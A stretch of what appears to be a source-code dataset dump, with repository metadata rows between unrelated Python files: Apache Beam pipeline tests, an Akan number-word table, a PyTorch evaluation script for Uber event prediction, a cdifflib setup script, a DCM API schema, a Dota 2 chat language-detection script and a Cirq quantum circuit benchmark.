class TestDoFn(DoFn):
def process(self, element):
yield element + 10
pipeline = TestPipeline()
pcoll = pipeline | 'Create' >> Create([1, 2]) | 'Do' >> ParDo(TestDoFn())
assert_that(pcoll, equal_to([11, 12]))
pipeline.run()
def test_side_input_no_tag(self):
class TestDoFn(DoFn):
def process(self, element, prefix, suffix):
return ['%s-%s-%s' % (prefix, element, suffix)]
pipeline = TestPipeline()
words_list = ['aa', 'bb', 'cc']
words = pipeline | 'SomeWords' >> Create(words_list)
prefix = 'zyx'
suffix = pipeline | 'SomeString' >> Create(['xyz']) # side in
result = words | 'DecorateWordsDoFnNoTag' >> ParDo(
TestDoFn(), prefix, suffix=AsSingleton(suffix))
assert_that(result, equal_to(['zyx-%s-xyz' % x for x in words_list]))
pipeline.run()
def test_side_input_tagged(self):
class TestDoFn(DoFn):
def process(self, element, prefix, suffix=DoFn.SideInputParam):
return ['%s-%s-%s' % (prefix, element, suffix)]
pipeline = TestPipeline()
words_list = ['aa', 'bb', 'cc']
words = pipeline | 'SomeWords' >> Create(words_list)
prefix = 'zyx'
suffix = pipeline | 'SomeString' >> Create(['xyz']) # side in
result = words | 'DecorateWordsDoFnNoTag' >> ParDo(
TestDoFn(), prefix, suffix=AsSingleton(suffix))
assert_that(result, equal_to(['zyx-%s-xyz' % x for x in words_list]))
pipeline.run()
def test_window_param(self):
class TestDoFn(DoFn):
def process(self, element, window=DoFn.WindowParam):
yield (element, (float(window.start), float(window.end)))
pipeline = TestPipeline()
pcoll = (pipeline
| Create([1, 7])
| Map(lambda x: TimestampedValue(x, x))
| WindowInto(windowfn=SlidingWindows(10, 5))
| ParDo(TestDoFn()))
assert_that(pcoll, equal_to([(1, (-5, 5)), (1, (0, 10)),
(7, (0, 10)), (7, (5, 15))]))
pcoll2 = pcoll | 'Again' >> ParDo(TestDoFn())
assert_that(
pcoll2,
equal_to([
((1, (-5, 5)), (-5, 5)), ((1, (0, 10)), (0, 10)),
((7, (0, 10)), (0, 10)), ((7, (5, 15)), (5, 15))]),
label='doubled windows')
pipeline.run()
def test_timestamp_param(self):
class TestDoFn(DoFn):
def process(self, element, timestamp=DoFn.TimestampParam):
yield timestamp
pipeline = TestPipeline()
pcoll = pipeline | 'Create' >> Create([1, 2]) | 'Do' >> ParDo(TestDoFn())
assert_that(pcoll, equal_to([MIN_TIMESTAMP, MIN_TIMESTAMP]))
pipeline.run()
def test_timestamp_param_map(self):
with TestPipeline() as p:
assert_that(
p | Create([1, 2]) | beam.Map(lambda _, t=DoFn.TimestampParam: t),
equal_to([MIN_TIMESTAMP, MIN_TIMESTAMP]))
class Bacon(PipelineOptions):
@classmethod
def _add_argparse_args(cls, parser):
parser.add_argument('--slices', type=int)
class Eggs(PipelineOptions):
@classmethod
def _add_argparse_args(cls, parser):
parser.add_argument('--style', default='scrambled')
class Breakfast(Bacon, Eggs):
pass
class PipelineOptionsTest(unittest.TestCase):
def test_flag_parsing(self):
options = Breakfast(['--slices=3', '--style=sunny side up', '--ignored'])
self.assertEqual(3, options.slices)
self.assertEqual('sunny side up', options.style)
def test_keyword_parsing(self):
options = Breakfast(
['--slices=3', '--style=sunny side up', '--ignored'],
slices=10)
self.assertEqual(10, options.slices)
self.assertEqual('sunny side up', options.style)
def test_attribute_setting(self):
options = Breakfast(slices=10)
self.assertEqual(10, options.slices)
options.slices = 20
self.assertEqual(20, options.slices)
def test_view_as(self):
generic_options = PipelineOptions(['--slices=3'])
self.assertEqual(3, generic_options.view_as(Bacon).slices)
self.assertEqual(3, generic_options.view_as(Breakfast).slices)
generic_options.view_as(Breakfast).slices = 10
self.assertEqual(10, generic_options.view_as(Bacon).slices)
with self.assertRaises(AttributeError):
generic_options.slices # pylint: disable=pointless-statement
with self.assertRaises(AttributeError):
generic_options.view_as(Eggs).slices # pylint: disable=expression-not-assigned
def test_defaults(self):
options = Breakfast(['--slices=3'])
self.assertEqual(3, options.slices)
self.assertEqual('scrambled', options.style)
def test_dir(self):
options = Breakfast()
self.assertEqual(
set(['from_dictionary', 'get_all_options', 'slices', 'style',
'view_as', 'display_data']),
set([attr for attr in dir(options) if not attr.startswith('_') and
attr != 'next']))
self.assertEqual(
set(['from_dictionary', 'get_all_options', 'style', 'view_as',
'display_data']),
set([attr for attr in dir(options.view_as(Eggs))
if not attr.startswith('_') and attr != 'next']))
class RunnerApiTest(unittest.TestCase):
def test_parent_pointer(self):
class MyPTransform(beam.PTransform):
def expand(self, p):
self.p = p
return p | beam.Create([None])
p = beam.Pipeline()
p | MyPTransform() # pylint: disable=expression-not-assigned
p = Pipeline.from_runner_api(
Pipeline.to_runner_api(p, use_fake_coders=True), None, None)
self.assertIsNotNone(p.transforms_stack[0].parts[0].parent)
self.assertEqual(p.transforms_stack[0].parts[0].parent,
p.transforms_stack[0])
class DirectRunnerRetryTests(unittest.TestCase):
def test_retry_fork_graph(self):
# TODO(BEAM-3642): The FnApiRunner currently does not currently support
# retries.
p = beam.Pipeline(runner='BundleBasedDirectRunner')
# TODO(mariagh): Remove the use of globals from the test.
global count_b, count_c # pylint: disable=global-variable-undefined
count_b, count_c = 0, 0
def f_b(x):
global count_b # pylint: disable=global-variable-undefined
count_b += 1
raise Exception('exception in f_b')
def f_c(x):
global count_c # pylint: disable=global-variable-undefined
count_c += 1
raise Exception('exception in f_c')
names = p | 'CreateNodeA' >> beam.Create(['Ann', 'Joe'])
fork_b = names | 'SendToB' >> beam.Map(f_b) # pylint: disable=unused-variable
fork_c = names | 'SendToC' >> beam.Map(f_c) # pylint: disable=unused-variable
with self.assertRaises(Exception):
p.run().wait_until_finish()
assert count_b == count_c == 4
def test_no_partial_writeouts(self):
class TestTransformEvaluator(_TransformEvaluator):
def __init__(self):
self._execution_context = _ExecutionContext(None, {})
def start_bundle(self):
self.step_context = self._execution_context.get_step_context()
def process_element(self, element):
k, v = element
state = self.step_context.get_keyed_state(k)
state.add_state(None, _GroupByKeyOnlyEvaluator.ELEMENTS_TAG, v)
# Create instance and add key/value, key/value2
evaluator = TestTransformEvaluator()
evaluator.start_bundle()
self.assertIsNone(evaluator.step_context.existing_keyed_state.get('key'))
self.assertIsNone(evaluator.step_context.partial_keyed_state.get('key'))
evaluator.process_element(['key', 'value'])
self.assertEqual(
evaluator.step_context.existing_keyed_state['key'].state,
defaultdict(lambda: defaultdict(list)))
self.assertEqual(
evaluator.step_context.partial_keyed_state['key'].state,
{None: {'elements':['value']}})
evaluator.process_element(['key', 'value2'])
self.assertEqual(
evaluator.step_context.existing_keyed_state['key'].state,
defaultdict(lambda: defaultdict(list)))
self.assertEqual(
evaluator.step_context.partial_keyed_state['key'].state,
{None: {'elements':['value', 'value2']}})
# Simulate an exception (redo key/value)
evaluator._execution_context.reset()
evaluator.start_bundle()
evaluator.process_element(['key', 'value'])
self.assertEqual(
evaluator.step_context.existing_keyed_state['key'].state,
defaultdict(lambda: defaultdict(list)))
self.assertEqual(
evaluator.step_context.partial_keyed_state['key'].state,
{None: {'elements':['value']}})
if __name__ == '__main__':
logging.getLogger().setLevel(logging.DEBUG)
unittest.main()
| 35.728033 | 85 | 0.666315 |
1abfbe9c65a87f718ec052856a123254c1f8ac71 | 501 | py | Python | number_parser/data/ak.py | hellc/number-parser | 1e62fe5562f334f1fbac7eeb3b208e98b255db5f | [
"BSD-3-Clause"
] | null | null | null | number_parser/data/ak.py | hellc/number-parser | 1e62fe5562f334f1fbac7eeb3b208e98b255db5f | [
"BSD-3-Clause"
] | null | null | null | number_parser/data/ak.py | hellc/number-parser | 1e62fe5562f334f1fbac7eeb3b208e98b255db5f | [
"BSD-3-Clause"
] | null | null | null | info = {
"UNIT_NUMBERS": {
"a-ɛ-tɔ-so-hwee": 0,
"hwee": 0,
"a-ɛ-di-kane": 1,
"biako": 1,
"koro": 1,
"abien": 2,
"abiasa": 3,
"anan": 4,
"anum": 5,
"asia": 6,
"asuon": 7,
"awɔtwe": 8,
"akron": 9
},
"DIRECT_NUMBERS": {},
"TENS": {
"aduonu": 20,
"aduasa": 30
},
"HUNDREDS": {},
"BIG_POWERS_OF_TEN": {},
"SKIP_TOKENS": [],
"USE_LONG_SCALE": False
}
| 18.555556 | 28 | 0.37525 |
92da21d2fc400ccf7f84570ab8b97a5e5a19f112 | 11,872 | py | Python | MachineLearning/checkNerualNetworkResultsV2.py | ChanaRoss/Thesis | 39ab83d52055d401a3bb71da25b3458ad9196ecd | [
"Apache-2.0"
] | null | null | null | MachineLearning/checkNerualNetworkResultsV2.py | ChanaRoss/Thesis | 39ab83d52055d401a3bb71da25b3458ad9196ecd | [
"Apache-2.0"
] | 9 | 2020-03-24T17:19:30.000Z | 2022-03-11T23:55:15.000Z | MachineLearning/checkNerualNetworkResultsV2.py | ChanaRoss/Thesis | 39ab83d52055d401a3bb71da25b3458ad9196ecd | [
"Apache-2.0"
] | null | null | null | # mathematical imports -
import numpy as np
from matplotlib import pyplot as plt
from sklearn import metrics
from math import sqrt
import seaborn as sns
sns.set()
import torch
# load network imports -
import os
import sys
sys.path.insert(0, '/Users/chanaross/dev/Thesis/MachineLearning/forGPU/')
from CNN_LSTM_NeuralNet_LimitZerosV2 import Model
sys.path.insert(0, '/Users/chanaross/dev/Thesis/UtilsCode/')
from createGif import create_gif
def createRealEventsUberML_network(eventMatrix, startTime, endTime):
firstTime = startTime
if (endTime - startTime==0):
numTimeSteps = 1
else:
numTimeSteps = endTime - startTime
realMatOut = eventMatrix[firstTime: firstTime + numTimeSteps, :, :]
return realMatOut
def getInputMatrixToNetwork(previousMat, sizeCnn):
# previousMat is of shape : [seq_len , size_x, size_y]
lenSeqIn = previousMat.shape[0]
lengthX = previousMat.shape[1]
lengthY = previousMat.shape[2]
temp2 = np.zeros(shape=(1, lenSeqIn, sizeCnn, sizeCnn, lengthX * lengthY))
tempPadded = np.zeros(shape=(lenSeqIn, lengthX + sizeCnn, lengthY + sizeCnn))
padding_size = np.floor_divide(sizeCnn, 2)
tempPadded[:, padding_size: padding_size + lengthX, padding_size: padding_size + lengthY] = previousMat
k = 0
for i in range(lengthX):
for j in range(lengthY):
try:
temp2[0, :, :, :, k] = tempPadded[:, i:i + sizeCnn, j: j + sizeCnn]
except:
print("couldnt create input for cnn ")
k += 1
xArr = temp2
if torch.cuda.is_available():
xTensor = torch.Tensor(xArr).cuda()
else:
xTensor = torch.Tensor(xArr)
# xTensor is of shape: [grid id, seq, x_cnn, y_cnn]
return xTensor
def createEventDistributionUber(previousEventMatrix, my_net, eventTimeWindow, startTime, endTime):
"""
this function calculates future events based on cnn lstm network
:param previousEventMatrix: event matrix of previous events
:param my_net: learned network
:param eventTimeWindow: time each event is opened (for output)
:param startTime: start time from which events are created
:param endTime: end time to create events (start and end time define the output sequence length)
:return: eventPos, eventTimeWindow, outputEventMat
"""
# previousEventMatrix is of size: [seq_len, x_size, y_size]
if endTime - startTime == 0: # should output one prediction
out_seq = 1
else:
out_seq = endTime - startTime
x_size = previousEventMatrix.shape[1]
y_size = previousEventMatrix.shape[2]
netEventOut = torch.zeros([out_seq, x_size, y_size])
for seq in range(out_seq):
tempEventMat = previousEventMatrix
testOut = my_net.forward(previousEventMatrix.reshape(shape=(my_net.seq_len, x_size*y_size)))
input = getInputMatrixToNetwork(previousEventMatrix, my_net.cnn_input_dimension)
k = 0
for x in range(x_size):
for y in range(y_size): # calculate output for each grid_id
testOut = my_net.forward(input[:, :, :, :, k])
_, netEventOut[seq, x, y] = torch.max(torch.exp(testOut.data), 1)
k += 1
previousEventMatrix[0:-1, :, :] = tempEventMat[1:, :, :]
previousEventMatrix[-1, :, :] = netEventOut[seq, :, :]
# in the end netEventOut is a matrix of size [out_seq_len, size_x, size_y]
eventPos = []
eventTimes = []
for t in range(out_seq):
for x in range(x_size):
for y in range(y_size):
numEvents = netEventOut[t, x, y]
# print('at loc:' + str(x) + ',' + str(y) + ' num events:' + str(numEvents))
#for n in range(numEvents):
if numEvents > 0:
eventPos.append(np.array([x, y]))
eventTimes.append(t+startTime)
eventsPos = np.array(eventPos)
eventTimes = np.array(eventTimes)
eventsTimeWindow = np.column_stack([eventTimes, eventTimes + eventTimeWindow])
return eventsPos, eventsTimeWindow, netEventOut.detach().numpy()
def getPreviousEventMat(dataInputReal, start_time, in_seq_len = 5):
lastPreviousTime = start_time
previousEventMatrix = np.zeros(shape=(in_seq_len, dataInputReal.shape[1], dataInputReal.shape[2]))
if lastPreviousTime - in_seq_len >= 0: # there are enough previous events known to system
previousEventMatrix = dataInputReal[lastPreviousTime-in_seq_len:lastPreviousTime, :, :]
else: # need to pad results
previousEventMatrix[in_seq_len-lastPreviousTime:, :, :] = dataInputReal
return previousEventMatrix
def plotSpesificTime(dataReal, dataPred, t, fileName):
dataReal = dataReal.reshape(dataReal.shape[1], dataReal.shape[2])
dataPred = dataPred.reshape(dataPred.shape[1], dataPred.shape[2])
day = np.floor_divide(t, 2 * 24) + 1 # sunday is 1
week = np.floor_divide(t, 2 * 24 * 7) + 14 # first week is week 14 of the year
hour, temp = np.divmod(t, 2)
hour += 8 # data starts from 98 but was normalized to 0
_, hour = np.divmod(hour, 24)
minute = temp * 30
dataFixed = np.zeros_like(dataReal)
dataFixed = np.swapaxes(dataReal, 1, 0)
dataFixed = np.flipud(dataFixed)
dataFixedPred = np.zeros_like(dataPred)
dataFixedPred = np.swapaxes(dataPred, 1, 0)
dataFixedPred = np.flipud(dataFixedPred)
f, axes = plt.subplots(1, 2)
ticksDict = list(range(2))
sns.heatmap(dataFixed, cbar = False, center = 1, square=True, vmin = 0, vmax = 1, ax=axes[0], cmap = 'CMRmap_r', cbar_kws=dict(ticks=ticksDict))
sns.heatmap(dataFixedPred, cbar=True, center=1, square=True, vmin=0, vmax=1, ax=axes[1], cmap='CMRmap_r',cbar_kws=dict(ticks=ticksDict))
axes[0].set_title('week- {0}, day- {1},time- {2}:{3}'.format(week, day, hour, minute) + ' , Real data')
axes[1].set_title('Predicted data')
# plt.title('time is - {0}:{1}'.format(hour, minute))
axes[0].set_xlabel('X axis')
axes[0].set_ylabel('Y axis')
axes[1].set_xlabel('X axis')
axes[1].set_ylabel('Y axis')
plt.savefig(fileName + '_' + str(t) +'.png')
plt.close()
return
def main():
# network_path = '/Users/chanaross/dev/Thesis/MachineLearning/forGPU/GPU_results/limitedZero_500grid/'
# network_name = 'gridSize11_epoch86_batch35_torch.pkl'
network_path = '/Users/chanaross/dev/Thesis/MachineLearning/forGPU/GPU_results/limitedZero_backprob/'
network_name = 'gridSize11_epoch100_batch20_torch.pkl'
data_path = '/Users/chanaross/dev/Thesis/UberData/'
data_name = '3D_allDataLatLonCorrected_binaryClass_500gridpickle_30min.p'
# network_name = 'gridSize20_epoch608_batch9_torch.pkl'
# data_path = '/Users/chanaross/dev/Thesis/UberData/'
# data_name = '3D_allDataLatLonCorrected_500gridpickle_30min.p'
dataInputReal = np.load(data_path + data_name)
my_net = torch.load(network_path + network_name, map_location=lambda storage, loc: storage)
my_net.eval()
xmin = 0
xmax = dataInputReal.shape[0]
ymin = 0
ymax = dataInputReal.shape[1]
zmin = 48
dataInputReal = dataInputReal[xmin:xmax, ymin:ymax, zmin:] #shrink matrix size for fast training in order to test model
# dataInputReal[dataInputReal > 1] = 1
# reshape input data for network format -
lengthT = dataInputReal.shape[2]
lengthX = dataInputReal.shape[0]
lengthY = dataInputReal.shape[1]
dataInputReal = np.swapaxes(dataInputReal, 0, 1)
dataInputReal = np.swapaxes(dataInputReal, 0, 2)
# dataInputReal = dataInputReal.reshape(lengthT, lengthX, lengthY)
accuracy = []
rmse = []
numEventsCreated = []
numEventsPredicted = []
correct_non_zeros = []
correct_zeros = []
timeOut = []
figPath = '/Users/chanaross/dev/Thesis/MachineLearning/forGPU/GPU_results/limitedZero_backprob/figures/'
numRuns = 10
fileName = '500grid_30min_binary_network_results_'+str(numRuns)
for i in range(numRuns):
print("run num:"+str(i))
start_time = i+200
# start_time = np.random.randint(10, dataInputReal.shape[0] - 10)
timeOut.append(start_time)
end_time = start_time + 0
realMatOut = createRealEventsUberML_network(dataInputReal, start_time, end_time)
previousEventMatrix = getPreviousEventMat(dataInputReal, start_time, my_net.sequence_size)
eventsPos, eventsTimeWindow, netEventOut = createEventDistributionUber(previousEventMatrix, my_net, 3, start_time, end_time)
sizeMat = netEventOut.size
rmse.append(sqrt(metrics.mean_squared_error(realMatOut.reshape(-1), netEventOut.reshape(-1))))
accuracy.append(np.sum(realMatOut == netEventOut) / (sizeMat))
sizeMat_zeros = netEventOut[realMatOut == 0].size
sizeMat_non_zeros = netEventOut[realMatOut != 0].size
if (sizeMat_non_zeros>0):
correct_non_zeros.append(np.sum(netEventOut[realMatOut != 0] == realMatOut[realMatOut != 0]) / sizeMat_non_zeros)
if sizeMat_zeros>0:
correct_zeros.append(np.sum(netEventOut[realMatOut == 0] == realMatOut[realMatOut == 0]) / sizeMat_zeros)
plotSpesificTime(realMatOut, netEventOut, start_time, figPath + fileName)
numEventsCreated.append(np.sum(realMatOut))
numEventsPredicted.append(np.sum(netEventOut))
# realMatOut[realMatOut > 1] = 1
# distMatOut[distMatOut > 1] = 1
# accuracy1.append(np.sum(np.sum(realMatOut == distMatOut)/(realMatOut.shape[0]*realMatOut.shape[1])))
# if (realMatOut[realMatOut!=0].size >0):
# non_zero_accuracy1.append(np.sum(np.sum(realMatOut[realMatOut != 0] == distMatOut[realMatOut != 0]))/(realMatOut[realMatOut != 0].size))
#
# if (distMatOut[distMatOut!=0].size >0):
# non_zero_accuracy1_dist.append(np.sum(np.sum(realMatOut[distMatOut != 0] == distMatOut[distMatOut != 0]))/(realMatOut[distMatOut != 0].size))
listNames = [fileName + '_' + str(t) + '.png' for t in timeOut]
create_gif(figPath, listNames, 1, fileName)
plt.scatter(range(len(accuracy)), 100 * np.array(accuracy))
plt.xlabel('run number [#]')
plt.ylabel('accuracy [%]')
plt.figure()
plt.scatter(range(len(rmse)), np.array(rmse))
plt.xlabel('run number [#]')
plt.ylabel('RMSE')
plt.figure()
plt.scatter(range(len(numEventsCreated)), np.array(numEventsCreated), label="num real events")
plt.scatter(range(len(numEventsPredicted)), np.array(numEventsPredicted), label="num predicted")
plt.xlabel('run number [#]')
plt.ylabel('num events created')
plt.legend()
plt.figure()
plt.scatter(range(len(numEventsCreated)), np.abs(np.array(numEventsCreated) - np.array(numEventsPredicted)),label="difference between prediction and real")
plt.xlabel('run number [#]')
plt.ylabel('abs. (real - pred)')
plt.legend()
plt.figure()
plt.scatter(range(len(correct_zeros)), 100 * np.array(correct_zeros))
plt.xlabel('run number [#]')
plt.ylabel('correct_zeros')
plt.figure()
plt.scatter(range(len(correct_non_zeros)), 100 * np.array(correct_non_zeros))
plt.xlabel('run number [#]')
plt.ylabel('correct non zeros')
print("average RMSE for " + str(numRuns) + " runs is:" + str(np.mean(np.array(rmse))))
print("average accuracy for " + str(numRuns) + " runs is:" + str(100 * np.mean(np.array(accuracy))))
print("average corrected zeros " + str(numRuns) + " runs is:" + str(100 * np.mean(np.array(correct_zeros))))
print("average corrected non zeros for " + str(numRuns) + " runs is:" + str(100 * np.mean(np.array(correct_non_zeros))))
plt.show()
return
if __name__ == '__main__':
main()
print('Done.') | 43.808118 | 159 | 0.665768 |
a7a4143c8870d06d0556cd27e8f77e78ddf3b1fa | 1,126 | py | Python | setup.py | dang-xia/cdifflib | 6ba2d7aff69de3800986107279e709a6b47fdee5 | [
"BSD-3-Clause"
] | null | null | null | setup.py | dang-xia/cdifflib | 6ba2d7aff69de3800986107279e709a6b47fdee5 | [
"BSD-3-Clause"
] | null | null | null | setup.py | dang-xia/cdifflib | 6ba2d7aff69de3800986107279e709a6b47fdee5 | [
"BSD-3-Clause"
] | null | null | null | from setuptools import setup, Extension
import sys
if sys.version_info >= (3, 0):
module1 = [Extension('_cdifflib',
sources=['_cdifflib3.c'])]
else:
module1 = [Extension('_cdifflib',
sources=['_cdifflib.c'])]
setup(name='cdifflib',
version='1.1.0',
description='C implementation of parts of difflib',
ext_modules=module1,
py_modules=['cdifflib'],
test_suite='tests',
author='Matthew Duggan',
author_email='mgithub@guarana.org',
license='BSD',
url="https://github.com/mduggan/cdifflib",
keywords="difflib c diff",
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Console',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: MacOS :: MacOS X',
'Operating System :: Microsoft :: Windows',
'Operating System :: POSIX',
'Programming Language :: Python',
'Topic :: Software Development',
'Topic :: Text Processing :: General',
],
)
| 30.432432 | 57 | 0.566607 |
7c20fb8a0f98157f6c2d52dd4c1e4f2c5977bd52 | 3,663 | py | Python | starthinker/task/dcm_api/schema/targetableRemarketingListsListResponse.py | viohman/starthinker | 20bd2d7fd1e541eb8a2c9b7159941f667e22e38e | [
"Apache-2.0"
] | null | null | null | starthinker/task/dcm_api/schema/targetableRemarketingListsListResponse.py | viohman/starthinker | 20bd2d7fd1e541eb8a2c9b7159941f667e22e38e | [
"Apache-2.0"
] | 6 | 2021-03-19T12:00:18.000Z | 2022-02-10T09:43:42.000Z | starthinker/task/dcm_api/schema/targetableRemarketingListsListResponse.py | viohman/starthinker | 20bd2d7fd1e541eb8a2c9b7159941f667e22e38e | [
"Apache-2.0"
] | null | null | null | ###########################################################################
#
# Copyright 2019 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###########################################################################
targetableRemarketingListsListResponse_Schema = [
{
"description": "",
"name": "kind",
"type": "STRING",
"mode": "NULLABLE"
},
{
"description": "",
"name": "nextPageToken",
"type": "STRING",
"mode": "NULLABLE"
},
{
"name": "targetableRemarketingLists",
"type": "RECORD",
"mode": "REPEATED",
"fields": [
{
"description": "",
"name": "accountId",
"type": "INT64",
"mode": "NULLABLE"
},
{
"name": "active",
"type": "BOOLEAN",
"mode": "NULLABLE"
},
{
"description": "",
"name": "advertiserId",
"type": "INT64",
"mode": "NULLABLE"
},
[
{
"description": "",
"name": "dimensionName",
"type": "STRING",
"mode": "NULLABLE"
},
{
"description": "",
"name": "etag",
"type": "STRING",
"mode": "NULLABLE"
},
{
"description": "",
"name": "id",
"type": "STRING",
"mode": "NULLABLE"
},
{
"description": "",
"name": "kind",
"type": "STRING",
"mode": "NULLABLE"
},
{
"description": "BEGINS_WITH, CONTAINS, EXACT, WILDCARD_EXPRESSION",
"name": "matchType",
"type": "STRING",
"mode": "NULLABLE"
},
{
"description": "",
"name": "value",
"type": "STRING",
"mode": "NULLABLE"
}
],
{
"description": "",
"name": "description",
"type": "STRING",
"mode": "NULLABLE"
},
{
"description": "",
"name": "id",
"type": "INT64",
"mode": "NULLABLE"
},
{
"description": "",
"name": "kind",
"type": "STRING",
"mode": "NULLABLE"
},
{
"description": "",
"name": "lifeSpan",
"type": "INT64",
"mode": "NULLABLE"
},
{
"description": "",
"name": "listSize",
"type": "INT64",
"mode": "NULLABLE"
},
{
"description": "REMARKETING_LIST_SOURCE_ADX, REMARKETING_LIST_SOURCE_DBM, REMARKETING_LIST_SOURCE_DFA, REMARKETING_LIST_SOURCE_DFP, REMARKETING_LIST_SOURCE_DMP, REMARKETING_LIST_SOURCE_GA, REMARKETING_LIST_SOURCE_GPLUS, REMARKETING_LIST_SOURCE_OTHER, REMARKETING_LIST_SOURCE_PLAY_STORE, REMARKETING_LIST_SOURCE_XFP, REMARKETING_LIST_SOURCE_YOUTUBE",
"name": "listSource",
"type": "STRING",
"mode": "NULLABLE"
},
{
"description": "",
"name": "name",
"type": "STRING",
"mode": "NULLABLE"
},
{
"description": "",
"name": "subaccountId",
"type": "INT64",
"mode": "NULLABLE"
}
]
}
]
| 25.615385 | 357 | 0.470379 |
22403a6c555c9cf7d260c8024a7cd71038d72250 | 1,044 | py | Python | src/preprocessing_jl.py | h4pZ/Toxicity-in-Dota-2 | ad95feebe80ec09cf412c115d9c791045115c636 | [
"MIT"
] | 1 | 2020-07-21T19:58:06.000Z | 2020-07-21T19:58:06.000Z | src/preprocessing_jl.py | h4pZ/Toxicity-in-Dota-2 | ad95feebe80ec09cf412c115d9c791045115c636 | [
"MIT"
] | null | null | null | src/preprocessing_jl.py | h4pZ/Toxicity-in-Dota-2 | ad95feebe80ec09cf412c115d9c791045115c636 | [
"MIT"
] | null | null | null | import os
from joblib import Parallel, delayed
from langdetect import detect
import pandas as pd
from utils import get_project_path
# Parameters.
abs_project_path = get_project_path(__file__)
data_path = os.path.join(abs_project_path, "data")
# Loading the data.
df = pd.read_csv(os.path.join(data_path, "dota2_chat_messages.csv"))
# Replacing nan's on the text for empty strings.
df = df.fillna("")
def check_lang(text):
"""Will return the language corresponding to the
input text"""
try:
lang = detect(text)
except:
lang = "nal"
return lang
# IMPORTANT: haven't run this but discovered about joblib after doing the task
# with dask. Apparently is faster than dask since there is no graph overhead as in dask
# so from a few tests it seems that it might be faster than dask for about 2 hours.
languages = Parallel(n_jobs=8, verbose=11)(
delayed(check_lang)(df["text"][i]) for i in range(df.shape[0]))
df["language"] = languages
df.to_csv("./data/dota2_chat_messages_lang_jl.csv", index=False)
| 27.473684 | 87 | 0.729885 |
f12c4d88e4514e1793ab4aab0ad10e768c2d123a | 3,998 | py | Python | data/p3BR/R1/benchmark/startCirq311.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | data/p3BR/R1/benchmark/startCirq311.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | data/p3BR/R1/benchmark/startCirq311.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 5/15/20 4:49 PM
# @File : grover.py
# qubit number=3
# total number=58
import cirq
import cirq.google as cg
from typing import Optional
import sys
from math import log2
import numpy as np
#thatsNoCode
from cirq.contrib.svg import SVGCircuit
# Symbols for the rotation angles in the QAOA circuit.
def make_circuit(n: int, input_qubit):
c = cirq.Circuit() # circuit begin
c.append(cirq.H.on(input_qubit[0])) # number=1
c.append(cirq.rx(-0.09738937226128368).on(input_qubit[2])) # number=2
c.append(cirq.H.on(input_qubit[1])) # number=33
c.append(cirq.CZ.on(input_qubit[2],input_qubit[1])) # number=34
c.append(cirq.H.on(input_qubit[1])) # number=35
c.append(cirq.H.on(input_qubit[1])) # number=3
c.append(cirq.H.on(input_qubit[0])) # number=45
c.append(cirq.CZ.on(input_qubit[1],input_qubit[0])) # number=46
c.append(cirq.H.on(input_qubit[0])) # number=47
c.append(cirq.Y.on(input_qubit[1])) # number=15
c.append(cirq.CNOT.on(input_qubit[1],input_qubit[0])) # number=10
c.append(cirq.H.on(input_qubit[1])) # number=19
c.append(cirq.CZ.on(input_qubit[0],input_qubit[1])) # number=20
c.append(cirq.rx(-0.6000441968356504).on(input_qubit[1])) # number=28
c.append(cirq.H.on(input_qubit[1])) # number=21
c.append(cirq.H.on(input_qubit[1])) # number=30
c.append(cirq.CZ.on(input_qubit[0],input_qubit[1])) # number=31
c.append(cirq.H.on(input_qubit[1])) # number=32
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[1])) # number=48
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[1])) # number=51
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[1])) # number=55
c.append(cirq.X.on(input_qubit[1])) # number=56
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[1])) # number=57
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[1])) # number=53
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[1])) # number=50
c.append(cirq.H.on(input_qubit[2])) # number=29
c.append(cirq.H.on(input_qubit[1])) # number=36
c.append(cirq.CZ.on(input_qubit[0],input_qubit[1])) # number=37
c.append(cirq.Y.on(input_qubit[2])) # number=44
c.append(cirq.H.on(input_qubit[1])) # number=38
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[1])) # number=18
c.append(cirq.Z.on(input_qubit[1])) # number=11
c.append(cirq.rx(-1.1780972450961724).on(input_qubit[2])) # number=54
c.append(cirq.H.on(input_qubit[1])) # number=42
c.append(cirq.H.on(input_qubit[0])) # number=39
c.append(cirq.CZ.on(input_qubit[1],input_qubit[0])) # number=40
c.append(cirq.H.on(input_qubit[0])) # number=41
c.append(cirq.CNOT.on(input_qubit[2],input_qubit[1])) # number=26
c.append(cirq.Y.on(input_qubit[1])) # number=14
c.append(cirq.CNOT.on(input_qubit[1],input_qubit[0])) # number=5
c.append(cirq.X.on(input_qubit[1])) # number=6
c.append(cirq.Z.on(input_qubit[1])) # number=8
c.append(cirq.X.on(input_qubit[1])) # number=7
c.append(cirq.H.on(input_qubit[2])) # number=43
c.append(cirq.rx(-2.42845112122491).on(input_qubit[1])) # number=25
# circuit end
c.append(cirq.measure(*input_qubit, key='result'))
return c
def bitstring(bits):
return ''.join(str(int(b)) for b in bits)
if __name__ == '__main__':
qubit_count = 4
input_qubits = [cirq.GridQubit(i, 0) for i in range(qubit_count)]
circuit = make_circuit(qubit_count,input_qubits)
circuit = cg.optimized_for_sycamore(circuit, optimizer_type='sqrt_iswap')
circuit_sample_count =2000
simulator = cirq.Simulator()
result = simulator.run(circuit, repetitions=circuit_sample_count)
frequencies = result.histogram(key='result', fold_func=bitstring)
writefile = open("../data/startCirq311.csv","w+")
print(format(frequencies),file=writefile)
print("results end", file=writefile)
